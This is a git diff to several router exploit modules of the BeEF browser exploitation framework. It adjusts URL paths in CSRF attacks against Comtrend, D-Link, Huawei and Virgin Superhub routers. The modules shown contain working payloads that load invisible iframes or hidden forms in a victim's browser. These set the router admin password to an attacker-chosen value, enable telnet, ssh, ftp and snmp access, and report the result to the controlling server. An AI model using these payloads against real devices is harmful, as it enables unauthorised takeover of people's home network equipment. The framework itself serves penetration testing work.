diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js
index fdbedec46..d713b6b06 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js
@@ -18,12 +18,12 @@ beef.execute(function() {
   var passwd = '<%= @password %>';
 
   var ct5367_iframe1 = beef.dom.createInvisibleIframe();
-  ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+  ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
 
   var ct5367_iframe2 = beef.dom.createInvisibleIframe();
 
   var form = document.createElement('form');
-  form.setAttribute('action', gateway + "/password.cgi");
+  form.setAttribute('action', gateway + "password.cgi");
   form.setAttribute('method', 'post');
 
   var input = null;
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js
index b6cc7ab28..afe248983 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js
@@ -18,7 +18,7 @@ beef.execute(function() {
   var passwd = '<%= @password %>';
 
   var ct5367_iframe1 = beef.dom.createInvisibleIframe();
-  ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+  ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
 
   var ct5367_iframe2 = beef.dom.createInvisibleIframe();
   ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js
index ae1c98e23..f25c89a5b 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/command.js
+++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js
@@ -17,7 +17,7 @@ beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd = '<%= @password %>';
 
-  var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST",
+  var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
       [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
        {'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
        {'type':'hidden', 'name':'security:settings/password', 'value':passwd},
diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js
index a749117a8..bfe98e957 100644
--- a/modules/exploits/router/huawei_smartax_mt880/command.js
+++ b/modules/exploits/router/huawei_smartax_mt880/command.js
@@ -19,7 +19,7 @@ beef.execute(function() {
   var passwd = '<%= @password %>';
 
   var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
-  huawei_smartax_mt880_iframe.setAttribute('src', gateway+"/Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
+  huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js
index 5acb91421..3c84ee315 100644
--- a/modules/exploits/router/virgin_superhub_csrf/command.js
+++ b/modules/exploits/router/virgin_superhub_csrf/command.js
@@ -18,7 +18,7 @@ beef.execute(function() {
 	var gateway = '<%= @base %>'; 
 	var passwd  = '<%= @password %>';
 
-	var virgin_superhub_iframe = beef.dom.createIframeXsrfForm(gateway + "/goform/RgSecurity", "POST", [
+	var virgin_superhub_iframe = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
 		{'type':'hidden', 'name':'NetgearPassword', 'value':passwd} ,
 		{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
 		{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}